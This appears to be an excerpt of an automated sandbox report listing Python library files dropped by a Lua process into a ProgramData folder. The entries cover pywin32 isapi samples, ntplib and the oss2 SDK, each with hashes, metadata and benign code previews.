SHA-256:	813A9BFE5A520C3416BFC79C6FA02534272EC35AC15474A3531D5242010D8E83
SHA-512:	4C266E9FF9553626C279F3543DA7F97C8F72C99114AE7490C1EB61FAB75097523ADB755506A17B05A18FD2C57E20091EE33DA6DA7B28EAFD0E261DC7198274CA
Malicious:	false
Preview:	"""Installation utilities for Python ISAPI filters and extensions."""..# this code adapted from "Tomcat JK2 ISAPI redirector", part of Apache.# Created July 2004, Mark Hammond..import sys, os, imp, shutil, stat.import operator.from win32com.client import GetObject, Dispatch.from win32com.client.gencache import EnsureModule, EnsureDispatch.import win32api.import pythoncom.import winerror.import traceback.._APP_INPROC = 0._APP_OUTPROC = 1._APP_POOLED = 2._IIS_OBJECT = "IIS://LocalHost/W3SVC"._IIS_SERVER = "IIsWebServer"._IIS_WEBDIR = "IIsWebDirectory"._IIS_WEBVIRTUALDIR = "IIsWebVirtualDir"._IIS_FILTERS = "IIsFilters"._IIS_FILTER = "IIsFilter".._DEFAULT_SERVER_NAME = "Default Web Site"._DEFAULT_HEADERS = "X-Powered-By: Python"._DEFAULT_PROTECTION = _APP_POOLED..# Default is for 'execute' only access - ie, only the extension.# can be used. This can be overridden via your install script.._DEFAULT_ACCESS_EXECUTE = True._DEFAULT_ACCESS_READ = False._DEFAULT_ACCESS_WRITE = False.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\isapicon.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5221
Entropy (8bit):	4.586698580222028
Encrypted:	false
SSDEEP:	96:1qq1D+crfezmVTkZe+Cf38CzLF6P1CHpkczPhott49ssttgz8RKD338i:Z6crfoyAtCJVzPhoofRKDnx
MD5:	0037FFB92A2A1736A145937A56CBAE85
SHA1:	3F9800478B30229EB01CB5819C52A2C9C3DE21FC
SHA-256:	C08F29B178F6919DF4B133602D35D3582A9A6785723619EF59C8E0F2FFA3F05E
SHA-512:	276F85E1143B9E3194F99E5D0CA0F4A2978D92BAA81EE8B8BC6BD550D8E899F46BA11EDBCC478BD801113E686F58A24BC21E5822FE768642DD65855BB8714165
Malicious:	false
Preview:	"""Constants needed by ISAPI filters and extensions.""".# ======================================================================.# Copyright 2002-2003 by Blackdog Software Pty Ltd..# .# All Rights Reserved.# .# Permission to use, copy, modify, and distribute this software and.# its documentation for any purpose and without fee is hereby.# granted, provided that the above copyright notice appear in all.# copies and that both that copyright notice and this permission.# notice appear in supporting documentation, and that the name of .# Blackdog Software not be used in advertising or publicity pertaining to.# distribution of the software without specific, written prior.# permission..# .# BLACKDOG SOFTWARE DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,.# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN.# NO EVENT SHALL BLACKDOG SOFTWARE BE LIABLE FOR ANY SPECIAL, INDIRECT OR.# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER R

C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\samples\README.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1007
Entropy (8bit):	4.529291573878237
Encrypted:	false
SSDEEP:	24:lfQBJNHeeziBykvMQFsuoWg6k2MiXYzRpc2LwNlr8ZMzoX:iNHeeoyklF1oXr0Y19GlIZMc
MD5:	862443836E56F3162633B7D1C10A3CDF
SHA1:	A3E6090FE621057F32FBC1C6E12C9CB123348FAA
SHA-256:	C47BE454FB2E9736FC6FECAB31656A3999991423D534ED7DA86B6078DFC9241E
SHA-512:	BE461DB5FEE96EECB4B11C70D993C3006B1DB768CE27D109DE027F8BF587FEB71EEC017EE650268F6C5C32D5D45D5ABB20B2386EDE5E6BD1A9408CA6F9ADEE54
Malicious:	false
Preview:	In this directory you will find examples of ISAPI filters and extensions...The filter loading mechanism works like this:.* IIS loads the special Python "loader" DLL. This DLL will generally have a . leading underscore as part of its name..* This loader DLL looks for a Python module, by removing the first letter of. the DLL base name.. .This means that an ISAPI extension module consists of 2 key files - the loader.DLL (eg, "_MyIISModule.dll", and a Python module (which for this example.would be "MyIISModule.py")..When you install an ISAPI extension, the installation code checks to see if.there is a loader DLL for your implementation file - if one does not exist, .or the standard loader is different, it is copied and renamed accordingly...We use this mechanism to provide the maximum separation between different.Python extensions installed on the same server - otherwise filter order and.other tricky IIS semantics would need to be replicated. Also, each filter.gets its own thread-pool

C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\samples\advanced.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8100
Entropy (8bit):	4.629404307496681
Encrypted:	false
SSDEEP:	192:eBcnH7yzvwWyrS9kza4VKTVaKqS2pCqzfw/xCQU30dYs/O:eanH7bXrS9kUcnS248wEkY0O
MD5:	A9C5BED78B7897ED78F66CDB54659AB5
SHA1:	4D6FF66FE41C876D33E257883E2BCAFC280889EA
SHA-256:	19D802BD6415099DD1AAFA75D5F12265A295ED97AA6874EBB6770820CDA3A87B
SHA-512:	E72DF5F3AD0E45E1A029219A64468229BF9BA0BC3A7C37CE5E4312CF11788F47A957EC9C1634AA59B1E4A7D6FD6092CDA4C066177439013DC5536AAD20669CF9
Malicious:	false
Preview:	# This extension demonstrates some advanced features of the Python ISAPI.# framework..# We demonstrate:.# * Reloading your Python module without shutting down IIS (eg, when your.# .py implementation file changes.).# * Custom command-line handling - both additional options and commands..# * Using a query string - any part of the URL after a '?' is assumed to.# be "variable names" separated by '&' - we will print the values of.# these server variables..# * If the tail portion of the URL is "ReportUnhealthy", IIS will be.# notified we are unhealthy via a HSE_REQ_REPORT_UNHEALTHY request..# Whether this is acted upon depends on if the IIS health-checking.# tools are installed, but you should always see the reason written.# to the Windows event log - see the IIS documentation for more...from isapi import isapicon.from isapi.simple import SimpleExtension.import sys, os, stat..if hasattr(sys, "isapidllhandle"):. import win32traceutil..# Notes on reloading.# If your HttpFilter

C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\samples\redirector.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4719
Entropy (8bit):	4.711818624138941
Encrypted:	false
SSDEEP:	96:sG5aXNz069zFbBxRHumKH7A2OZFcnGAQcWQYuAfQJi:sGAXNz0q191KbA2OZUQdYs9
MD5:	533B76E269EB28923D5E54AA48CA1F9E
SHA1:	7535D36F0B4F40774E3B053F5C7219EBB38EA1C9
SHA-256:	F71E11CB21CBF5DDC31AE6EB376B8C70842485D8622C02C62782527F3AE155DD
SHA-512:	90F5AFEFEC6CB907A839AD37153ADA825E18854BF8DB3215552F779C2B2608F03345C0D501B4FF57C4CB56C5C4F2D43F10418F6B32A076A644219294828813C1
Malicious:	false
Preview:	# This is a sample ISAPI extension written in Python..#.# Please see README.txt in this directory, and specifically the.# information about the "loader" DLL - installing this sample will create.# "_redirector.dll" in the current directory. The readme explains this...# Executing this script (or any server config script) will install the extension.# into your web server. As the server executes, the PyISAPI framework will load.# this module and create your Extension and Filter objects...# This is the simplest possible redirector (or proxy) we can write. The.# extension installs with a mask of '*' in the root of the site..# As an added bonus though, we optionally show how, on IIS6 and later, we.# can use HSE_ERQ_EXEC_URL to ignore certain requests - in IIS5 and earlier.# we can only do this with an ISAPI filter - see redirector_with_filter for.# an example. If this sample is run on IIS5 or earlier it simply ignores.# any excludes...from isapi import isapicon, threaded_extension.import s

C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\samples\redirector_asynch.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2819
Entropy (8bit):	4.754712995623234
Encrypted:	false
SSDEEP:	48:r2mvHLf9aeJPLBZuATZhOcxerrnx8AHu/V1YKGaJxOoE8xDMczaQYuAfQ5s+nob:rVfr9ziATZpxerrxRHugBaJN5QcWQYua
MD5:	466B8504C8B41F04FA33CCBA554ACC0C
SHA1:	F827645BE8E4EA96630F8F7440BF6482BEA7C066
SHA-256:	DE7656B98AFD7C91449AADA5EF3E0CC6E0B21686B99F0E4903AA6AF0F3B2E8C6
SHA-512:	0085BCC733D84D9B789932CC2D138379077EB925338802F906AF5F7034204A2019604B68502822E0BF7E723F5F440671A1F7789AA56349D4B3F015B9F446DFAC
Malicious:	false
Preview:	# This is a sample ISAPI extension written in Python...# This is like the other 'redirector' samples, but uses asnch IO when writing.# back to the client (it does not use asynch io talking to the remote.# server!)..from isapi import isapicon, threaded_extension.import sys.import traceback.import urllib.request, urllib.parse, urllib.error..# sys.isapidllhandle will exist when we are loaded by the IIS framework..# In this case we redirect our output to the win32traceutil collector..if hasattr(sys, "isapidllhandle"):. import win32traceutil..# The site we are proxying..proxy = "http://www.python.org"..# We synchronously read chunks of this size then asynchronously write them..CHUNK_SIZE=8192..# The callback made when IIS completes the asynch write..def io_callback(ecb, fp, cbIO, errcode):. print("IO callback", ecb, fp, cbIO, errcode). chunk = fp.read(CHUNK_SIZE). if chunk:. ecb.WriteClient(chunk, isapicon.HSE_IO_ASYNC). # and wait for the next callback to say th

C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\samples\redirector_with_filter.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6630
Entropy (8bit):	4.65241475426086
Encrypted:	false
SSDEEP:	192:XGHkDjoBEpCV1KYL/aPzZgI+gqehDCWUPB2qo7rIYs4c:XGED0BEpCvxL/ar0Be+B/Yhc
MD5:	A7931D3297957FA4DAC965B65687D40C
SHA1:	BE91FB3C2E694D45C85F5EE3AEEEC85DCFC36525
SHA-256:	F10954ACD8EB5EDA0B254D5CAF668BADEF72453DEFC8358E3FA18FE171549AD3
SHA-512:	2A1D9182DD05CD15DD4F8487631FB9C8CD74A01D5DE4EC0843F1837DC77D04A973C09CBD0F6113F709DFF33A0B3A36C2C593C0DDEC21E43B933EC99F8DE75689
Malicious:	false
Preview:	# This is a sample configuration file for an ISAPI filter and extension.# written in Python..#.# Please see README.txt in this directory, and specifically the.# information about the "loader" DLL - installing this sample will create.# "_redirector_with_filter.dll" in the current directory. The readme explains.# this...# Executing this script (or any server config script) will install the extension.# into your web server. As the server executes, the PyISAPI framework will load.# this module and create your Extension and Filter objects...# This sample provides sample redirector:.# It is implemented by a filter and an extension, so that some requests can.# be ignored. Compare with 'redirector_simple' which avoids the filter, but.# is unable to selectively ignore certain requests..# The process is sample uses is:.# * The filter is installed globally, as all filters are..# * A Virtual Directory named "python" is setup. This dir has our ISAPI.# extension as the only application, mapped

C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\samples\test.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6315
Entropy (8bit):	4.529256776383225
Encrypted:	false
SSDEEP:	96:IsLNScJx5KY9EbV5qVE4G0p8K3aSz33q4maQFzCHzuWwKcrQU30H9QYuAfQLgvAO:IsRRVKTyaKqSDuzCHzfw/rQU30dYsUO
MD5:	64D7A11DC1815976199355BBFF18836A
SHA1:	006CBAA9AF25CC510D0712552F699730F4C2834C
SHA-256:	FEBB4C09F9AB898803028991DFB0F5BD117AD4EB14BDB421258F1821DA714592
SHA-512:	99A7CA0D95219F04E8605262A036DBEC13413B03EDE21EA1021F2ED6B0C66B09A6887398F389F5F03F264E5D2F5B5834F53E09DF12933DC688DEA982B073C904
Malicious:	false
Preview:	# This extension is used mainly for testing purposes - it is not.# designed to be a simple sample, but instead is a hotch-potch of things.# that attempts to exercise the framework...from isapi import isapicon.from isapi.simple import SimpleExtension.import sys, os, stat..if hasattr(sys, "isapidllhandle"):. import win32traceutil..# We use the same reload support as 'advanced.py' demonstrates..from isapi import InternalReloadException.import win32event, win32file, winerror, win32con, threading..# A watcher thread that checks for __file__ changing..# When it detects it, it simply sets "change_detected" to true..class ReloadWatcherThread(threading.Thread):. def __init__(self):. self.change_detected = False. self.filename = __file__. if self.filename.endswith("c") or self.filename.endswith("o"):. self.filename = self.filename[:-1]. self.handle = win32file.FindFirstChangeNotification(. os.path.dirname(self.filename),.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\simple.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2490
Entropy (8bit):	4.3916907940812795
Encrypted:	false
SSDEEP:	48:p2C72ZAC3m465Eu/4adcj961wkQZHm465XnLVPM66G4YS961NF:pPC3oEBj+wkWHoXLBaaS+NF
MD5:	CF7E9175662D34C2584F56DDEC4CFC73
SHA1:	EB66D8A7D796394A71DF38E0C0AC91DDABA6B4EA
SHA-256:	19603CD536D81653A48AE1E53CB4626BB98ABC0CBC78A7F358FA32DE9304A03C
SHA-512:	49F0C71DBFE929F71D36D4EAF1D8F4266774010C75B15042AB6E680E051653F2B84F9220C0116BE8F04EE58D93C459201866A518B4AC172A841AB39D34385F36
Malicious:	false
Preview:	"""Simple base-classes for extensions and filters...None of the filter and extension functions are considered 'optional' by the.framework. These base-classes provide simple implementations for the.Initialize and Terminate functions, allowing you to omit them,..It is not necessary to use these base-classes - but if you don't, you.must ensure each of the required methods are implemented.."""..class SimpleExtension:. "Base class for a simple ISAPI extension". def __init__(self):. pass.. def GetExtensionVersion(self, vi):. """Called by the ISAPI framework to get the extension version. . The default implementation uses the classes docstring to. set the extension description.""". # nod to our reload capability - vi is None when we are reloaded.. if vi is not None:. vi.ExtensionDesc = self.__doc__.. def HttpExtensionProc(self, control_block):. """Called by the ISAPI framework for each extension request.. .

C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\test\README.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.312082029380059
Encrypted:	false
SSDEEP:	3:hMCESHQzFUl2kyLEI3KXmv2X7AINfAEeAvEHVJKBmJn:huSHQzDkywI3KXm47AINf+WmJn
MD5:	373DBA22E181540278BB56E9050BB0C2
SHA1:	D9BE10C58C89360D7100E763BE060A3DAAD5FC80
SHA-256:	D20657ECFB4483C745C06CC3554A853A002F86FA393538D5C08795A53BE13587
SHA-512:	BE7017875FDA7839C79B2F963EFDEE3B18465604906F707CC601F12C9B026CFE8FD1BD0F8852011236045D073E95E80DF4775A7FA31B0BABD170966602669AF8
Malicious:	false
Preview:	This is a directory for tests of the PyISAPI framework...For demos, please see the pyisapi 'samples' directory.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\test\extension_simple.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4480
Entropy (8bit):	4.664830808555661
Encrypted:	false
SSDEEP:	96:aQJY3CLzWzQHukYlUdIIPi4uH+OYMRQ6cWQYuAfQMi:aQUfuLYlUeIPi4ueOYA/dYsM
MD5:	4BDF26B2215F409A4D27163E44FA56C5
SHA1:	C59F85484D5BB57BD86EF35546332DF10492EA8A
SHA-256:	DC9500CB2191B4477F4DDBF6CADDAF701A377264A67EFA6A59C20005D987FCE6
SHA-512:	7C0FA5EC1EFCBDBC8F201B1F5511B6C37A21FFFC495D98E8B03D599C75C8FB9F12A01AECB5D8EE7239E11B42FBA8803739F6C9AE76637DA0C962317EF918BF2A
Malicious:	false
Preview:	# This is an ISAPI extension purely for testing purposes. It is NOT.# a 'demo' (even though it may be useful!).#.# Install this extension, then point your browser to:.# "http://localhost/pyisapi_test/test1".# This will execute the method 'test1' below. See below for the list of.# test methods that are acceptable...from isapi import isapicon, threaded_extension, ExtensionError.from isapi.simple import SimpleFilter.import traceback.import urllib.request, urllib.parse, urllib.error.import winerror..# If we have no console (eg, am running from inside IIS), redirect output.# somewhere useful - in this case, the standard win32 trace collector..import win32api.try:. win32api.GetConsoleTitle().except win32api.error:. # No console - redirect. import win32traceutil..# The ISAPI extension - handles requests in our virtual dir, and sends the.# response to the client..class Extension(threaded_extension.ThreadPoolExtension):. "Python ISAPI Tester". def Dispatch(self, ecb):. p

C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\threaded_extension.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7214
Entropy (8bit):	4.5292849377379
Encrypted:	false
SSDEEP:	192:pjBkE/cXlsYMNKGxo9yU/tj4tcT6FnDVYt9TTqlk:pjxvYMN/SBV4tcTqnDVRk
MD5:	4D95C544913F523779F256E477697CF3
SHA1:	434541EDB0FCEE0A923D71FFCC3E93F4AB04C18E
SHA-256:	D1624412936A5CFE92AA8D7BB95814BC605D39C569CC22B090F2D735CF75FDA6
SHA-512:	256B208B551E3E166C5B0E921FDA662706E9CB9E6266275B7769B9CC8D281634EF7138E21E90DDB29B449D88EEE589715ADAB01C07A88498A0817D00C8299362
Malicious:	false
Preview:	"""An ISAPI extension base class implemented using a thread-pool.""".# $Id$..import sys.import time.from isapi import isapicon, ExtensionError.import isapi.simple.from win32file import GetQueuedCompletionStatus, CreateIoCompletionPort, \. PostQueuedCompletionStatus, CloseHandle.from win32security import SetThreadToken.from win32event import INFINITE.from pywintypes import OVERLAPPED..import threading.import traceback..ISAPI_REQUEST = 1.ISAPI_SHUTDOWN = 2..class WorkerThread(threading.Thread):. def __init__(self, extension, io_req_port):. self.running = False. self.io_req_port = io_req_port. self.extension = extension. threading.Thread.__init__(self). # We wait 15 seconds for a thread to terminate, but if it fails to,. # we don't want the process to hang at exit waiting for it.... self.setDaemon(True).. def run(self):. self.running = True. while self.running:. errCode, bytes, key, overla

C:\ProgramData\ShellExperienceHost\Lib\site-packages\ntplib-0.3.4.dist-info\INSTALLER Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\ntplib-0.3.4.dist-info\METADATA Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1382
Entropy (8bit):	5.162135298746545
Encrypted:	false
SSDEEP:	24:DMVcXGDD8Tq4QINICDOTFnQlV6RYqkyo4abCxnp/TKXHsAii2KuXBU3U3Va0:DMVcvTvQImCDsp2TCnaGKXHsVuABU3YL
MD5:	78E4C753F6541FB59E6D4AD963E7F805
SHA1:	758A50C80E46C91CACB61F518BCC8A4476136788
SHA-256:	1DEC883DE59F35D7C13AE0346F25E65FFED1FEE9927283CFDAB820ADDB49B95F
SHA-512:	F50F935AD3DCD3FA79DD22F083CC8C198A3400737E9E3A06416ABFCFBCF3B2C2CCEC0E5656F3F48446B845AE1144C965C749D815B60D212B813AAE791FD7CF75
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: ntplib.Version: 0.3.4.Summary: Python NTP library.Home-page: https://github.com/cf-natali/ntplib.Author: Charles-Francois Natali.Author-email: cf.natali@gmail.com.License: MIT.Platform: UNKNOWN.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Operating System :: OS Independent.Classifier: Topic :: System :: Networking :: Time Synchronization...ntplib - Python NTP library.===========================..Description.-----------..This module offers a simple interface to query NTP servers from Python...It also provides utility functions to translate NTP fields values to text (mode,.leap indicator...). Since it's pure Python, and only depends on core modules, it.should work on any platform with a Python implementation...Example.-------..>>> import ntplib.>>> from time import ctime.>>> c = ntplib.NTPClient().>>> response = c.request('europe.pool.ntp.org', version=3).>>> response.offset.-0.143156766891.>>> respo

C:\ProgramData\ShellExperienceHost\Lib\site-packages\ntplib-0.3.4.dist-info\RECORD Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	576
Entropy (8bit):	5.878179782365202
Encrypted:	false
SSDEEP:	12:v20a/2zDXLrDZuVPUlWEzpl4J2X0kol2oAfFO2cBAT9NIQny:en/2zDXbZIUlWEsJ2glnTB0NIQy
MD5:	014CA2ABD57AEC1F52ADA8E9D1C7F802
SHA1:	8677E9115D85DACD8EE96DBCB78E2CD485D8F74D
SHA-256:	144547940A668F3FF5515FDFDB943273AD4044CA20B2585ECD176FB11FCE7BA9
SHA-512:	C41CCA99E104754765D890B3C6A993A1C4C591622C41B8E9DA1782CFDDA59EE95B4DFBDCC11B8879037A2FE86455142E1F4A562B7B3BC83F0CE943D9A9E085F2
Malicious:	false
Preview:	__pycache__/ntplib.cpython-37.pyc,,..ntplib-0.3.4.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..ntplib-0.3.4.dist-info/METADATA,sha256=HeyIPeWfNdfBOuA0byXmX_7R_umScoPP2rggrdtJuV8,1382..ntplib-0.3.4.dist-info/RECORD,,..ntplib-0.3.4.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..ntplib-0.3.4.dist-info/WHEEL,sha256=g4nMs7d-Xl9-xC9XovUrsDHGXt-FT0E17Yqo92DEfvY,92..ntplib-0.3.4.dist-info/top_level.txt,sha256=VnQDTkmpqDRP8JA053hBpTY6HMR44cLtdvWLHhdP_9A,7..ntplib.py,sha256=b5LqE6j6D8Tne1c3ldSAWbd8ZhwvCoYi49GJvGrGYDg,13864..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\ntplib-0.3.4.dist-info\WHEEL Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	92
Entropy (8bit):	4.842566724466667
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlVitcv6KjP+tPCCfA5S:RtBMwlViWZWBBf
MD5:	2295CBFB2556C76D0EB0F184F7F5E416
SHA1:	AC049E2836CED0D89815B6A59D6FA063094EEA71
SHA-256:	8389CCB3B77E5E5F7EC42F57A2F52BB031C65EDF854F4135ED8AA8F760C47EF6
SHA-512:	9579F4AA5FB4131B79F1162100756459B0175521C919ACD75C74219531404191962FE56488CD0881D05FF8918720069D51CD014FFA19B96B75E1100EC7DECB49
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.34.2).Root-Is-Purelib: true.Tag: py3-none-any..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\ntplib-0.3.4.dist-info\top_level.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7
Entropy (8bit):	2.8073549220576046
Encrypted:	false
SSDEEP:	3:x4:e
MD5:	6E10C226559E381A473AB6E2BD1C69FE
SHA1:	FBCA73DEC715402FA4C14E122F08C01FF9C0DFD1
SHA-256:	5674034E49A9A8344FF09034E77841A5363A1CC478E1C2ED76F58B1E174FFFD0
SHA-512:	360EDE2F618E71CA4B063828C647CA916362DDC3F62721409C0D8B963304163D7C46580B34AC04A0ECE23B048CA074003C97E22A4A19E812048D9EB273DA402E
Malicious:	false
Preview:	ntplib.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\ntplib.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	13864
Entropy (8bit):	4.767505934624076
Encrypted:	false
SSDEEP:	192:eQHWSkvCdIP2idkB/R0yIpFGYxppweIAsxU9ouEdu0UgRxpHahm1FKV9us:ejSkvCJMkKFGo4xKouEdu0ZHf1FWus
MD5:	31F237DF17A1508EEBEBFA4ECB20C344
SHA1:	4DA8F970656505A40483206EF2B5D3DD5E81711D
SHA-256:	6F92EA13A8FA0FC4E77B573795D48059B77C661C2F0A8622E3D189BC6AC66038
SHA-512:	0FB70F67486534939FD0AFEC38042061B561E8471F8A78AA34FA6C9C5742CD9B0AFB468B137D34DB0697F057212D87E03C2849DC2DDE793FF375DCE50C1050C5
Malicious:	false
Preview:	###############################################################################.# The MIT License (MIT).#.# Copyright (C) 2009-2015 Charles-Francois Natali <cf.natali@gmail.com>.#.# Permission is hereby granted, free of charge, to any person obtaining a copy.# of this software and associated documentation files (the "Software"), to deal.# in the Software without restriction, including without limitation the rights.# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.# copies of the Software, and to permit persons to whom the Software is.# furnished to do so, subject to the following conditions:.#.# The above copyright notice and this permission notice shall be included in.# all copies or substantial portions of the Software..#.# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.# AUTHORS

C:\ProgramData\ShellExperienceHost\Lib\site-packages\oss2\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1075
Entropy (8bit):	4.9905498151421845
Encrypted:	false
SSDEEP:	24:zYOKusLCZRMPxsXGyWsZSCcypXjU5CCSf7KIXsbTcMqbMxfx1tkx6Cx6uteQR:zuj5ypzU6f7KIXcqoxLv7QR
MD5:	A11FA86DC3E7CA74357C891E7E555338
SHA1:	A8D1E2FC97D454F177ECD71F9D592386A71F76C0
SHA-256:	C839F36AF31E547D483135AE55FDBE235A7A87FF760AA3FCAF4A01FCB3FC3A55
SHA-512:	456CD8433D3116EC8C4C442E2DBEE190AC4E6BC6BF59ED3293C4EAFBA9E4CBAE432E4E48EA12B5016F8D5F4477528966AF6629F613CF44CEE7CC9E61D27D9AB8
Malicious:	false
Preview:	__version__ = '2.2.1'..from . import models, exceptions..from .api import Service, Bucket.from .auth import Auth, AnonymousAuth, StsAuth.from .http import Session, CaseInsensitiveDict...from .iterators import (BucketIterator, ObjectIterator,. MultipartUploadIterator, ObjectUploadIterator,. PartIterator, LiveChannelIterator)...from .resumable import resumable_upload, resumable_download, ResumableStore, ResumableDownloadStore, determine_part_size.from .resumable import make_upload_store, make_download_store...from .compat import to_bytes, to_string, to_unicode, urlparse, urlquote, urlunquote..from .utils import SizedFileAdapter, make_progress_adapter.from .utils import content_type_by_name, is_valid_bucket_name.from .utils import http_date, http_to_unixtime, iso8601_to_unixtime, date_to_iso8601, iso8601_to_date...from .models import BUCKET_ACL_PRIVATE, BUCKET_ACL_PUBLIC_READ, BUCKET_ACL_PUBLIC_READ_WRITE.from .models import OBJECT_ACL_DEFAULT

C:\ProgramData\ShellExperienceHost\Lib\site-packages\oss2\api.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	29045
Entropy (8bit):	5.13971865696725
Encrypted:	false
SSDEEP:	384:9xAQNRAcENVt4ubCJucQ0KOOvVpXajRdhJuTW6f2Cnmi9VWfVmWSf:97RAcEMJucQEhJuTPf2Cnmi+VmWSf
MD5:	0FA30A78A62F2E3080E5C34017CACB8D
SHA1:	90A106383C9567B1110E861ABBCF7B4326E39875
SHA-256:	3B13A4EFEB71C77D6E6067913F615F037FB17CAF581113F78EF0CCBBA5DC470E
SHA-512:	F4B4B4B79A5988BC342D8E850B6A3E12A845883738085EA98BCC496B387FA3D5CAE578F37A2E128A8F2FF4099FEF4D68A6A2F897FBC663128BB881B6C8C094D8
Malicious:	false
Preview:	# -- coding: utf-8 --...from . import xml_utils.from . import http.from . import utils.from . import exceptions.from . import defaults..from .models import .from .compat import urlquote, urlparse, to_unicode, to_string..import time.import shutil.import oss2.utils...class _Base(object):. def __init__(self, auth, endpoint, is_cname, session, connect_timeout,. app_name='', enable_crc=True):. self.auth = auth. self.endpoint = _normalize_endpoint(endpoint.strip()). self.session = session or http.Session(). self.timeout = defaults.get(connect_timeout, defaults.connect_timeout). self.app_name = app_name. self.enable_crc = enable_crc.. self._make_url = _UrlMaker(self.endpoint, is_cname).. def _do(self, method, bucket_name, key, kwargs):. key = to_string(key). req = http.Request(method, self._make_url(bucket_name, key),. app_name=self.app_name,. *kwargs)

C:\ProgramData\ShellExperienceHost\Lib\site-packages\oss2\auth.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7375
Entropy (8bit):	5.026357031608356
Encrypted:	false
SSDEEP:	192:dJAMqrRL53S5kJIsLh3qg5/bAR6DPH485gH:LAMqw6Dx+H
MD5:	0BBEE2119B47C0E4D17CCEDCD67D90E6
SHA1:	9E165D17909ED14122C793D065D8048CD89063A5
SHA-256:	E4E55020688477F0F0BF9AFE91C53AA11F40B6DE9AD14739D41F55BE3562EA39
SHA-512:	B6A0886FECF03A2E5EDD1D454E4D1ED23CD74F999C01E448BEB9D72E1E114C451AEFA35C58E6BABABC4495159A697AB252CFB222E88DBC441C0091DAEA7ED0F9
Malicious:	false
